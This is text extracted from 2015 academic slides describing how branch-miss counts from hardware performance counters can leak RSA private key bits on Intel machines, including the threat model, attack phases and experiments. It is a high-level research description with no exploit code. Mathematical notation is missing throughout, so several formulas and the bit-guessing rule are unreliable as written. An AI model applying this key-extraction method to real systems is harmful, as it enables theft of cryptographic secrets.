Utilizing Performance Monitors for Compromising keys of RSA on Intel

Platforms

Sarani Bhattacharya and Debdeep Mukhopadhyay

Dept. of Computer Science and Engineering

Indian Institute of Technology, Kharagpur, India

10 March 2015

Public-Key Cryptography

RSA Encryption & Decryption

3

Plaintext: M

C = Me mod (n=pq)

Ciphertext: C

Cd mod n

From n, difficult to figure out p,qFrom (n,e), difficult to figure d.From (n,e) and C, difficult to figure out M s.t. C = Me

Popular variants of Modular Exponentiation Algorithm

SPA and Timing Side Channel Resistant Algorithm for Modular Exponentiation

Primitive Algorithm for Performing Multiplication and Squaring

Modelling Branch Miss as Side-Channel from HPC

Profiling of HPCs are done using performance monitoring tools and considered as side-channel.

Provides simple user interface to different hardware event counts.

Branch misses rely on the ability of the branch predictor to correctly predict future branches to be taken.

Strong Correlation between two-bit predictor and system predictor

• $ perf stat -e branch-misses executable-name

Direct correlation is observed for the branch misses from HPCs and from the simulated 2-bit dynamic predictor over a sample of exponent bitstream.

This confirms assumption of 2-bit dynamic predictor being an approximation to the underlying system branch predictor.

Threat model of the AttackAttacker knows first i bits of the

private key and wants to determine next unknown bit of the key (, , · · · , , · · · , )

Generate a trace of branches as (, , · · · , )

Under the assumption of having value j, where j ∈ {0, 1}, appropriate value of is simulated.

Offline Phase of Attack

Separation of Random Inputs

We ensure there must be nocommon ciphertexts in the sets (, ) and (, ) and the sets are disjoint.

Online PhaseBranch misses from HPCs are

monitored for execution of cipher over the entire secret key on each ciphertext for 4 separate sets.

The probable next bit is decided as:

Experimental ValidationA large input set is separated by

simulations over bimodal and two-level adaptive predictor.

Average branch misses are observed from HPCs for each elements in set and

Each set has L = 1000 elements.Experiment is repeated over I =

1000 iterations.

Comparison with Timing Side-channel

Variation in separation with increase of Ciphertexts

Variation in separation with increase in number of Iterations

RSA-OAEP Randomized Padding Scheme

Decryption in RSA-OAEP

Separation for RSA-OAEP scheme

Thank you.